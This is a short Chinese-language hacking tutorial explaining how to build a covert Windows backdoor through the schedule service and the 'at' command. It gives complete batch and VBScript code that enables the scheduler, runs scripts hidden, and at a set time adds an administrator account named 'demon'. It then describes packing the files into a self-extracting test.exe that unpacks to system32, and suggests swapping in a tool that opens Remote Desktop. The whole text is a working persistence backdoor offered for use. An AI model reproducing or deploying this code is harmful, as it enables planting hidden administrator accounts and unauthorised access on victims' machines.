schedule服务的后门应用

各位是否记得IPC$漏洞时用到的一个命令？没错，它就是at命令，其功能是在定时的时间内完成指定操作，而今天我们可以用它来做个一个隐蔽的后门程序。后门的功能就是在指定的时间创建一个系统用户


at命令事实上对应了一个服务，名叫schedule服务，在services中我们可以找到一个taskscheduler的服务名称，这就是它所对应的服务了，但是在普遍情况下此服务时禁用的，我们要做的第一个操作就是开启这项服务。


这个后门程序是一个自解压缩文件，其实是由4个文件构成，分别为a.vbs、a.bat、b.vbs、b.bat，这四个文件我们再用来合成一个自解压缩文件。4个文件代码其实很简单，我直接贴出：

 
[pre]// a.bat： @echo off @sc config schedule start= auto @sc start schedule ping 127.1 at time /interactive %systemroot%\system32\b.vbs //time是自定义的时间，如 6：30  // a.vbs： set ws=wscript.createobject("wscript.shell") ws.run "a.bat",0 wscript.sleep 10000  // b.bat： @echo off @net user demon demon /add @net localgroup administrators demon /add  //b.vbs： set ws=wscript.createobject("wscript.shell") ws.run "b.bat",0 wscript.sleep 10000  我们把四个文件一次合 [/pre]
成为一个自解压缩文件，解压路径为system32目录，解压后运行a.vbs其他选项设置为隐藏即可。

生成一个test.exe就是一个后门程序了，我们来看下流程，运行test.exe文件将会解压到system32目录，紧接着运行a.vbs，a.vbs又是以隐藏模式运行a.bat，a.bat设置了指定时间运行b.vbs，当到了指定时间后，b.vbs运行，b.vbs又是以隐藏模式执行b.bat，这样就神不知鬼不觉的添加了个系统账户，其实B.BAT我们可以换成一个自开3389或者是类似的后门工具。这样就不怕管理员删除我们的后门程序了，因为当在指定时间，又会执行一次后门程序。


本文内容简单，重要还是各位思路的运用了。
 
 
*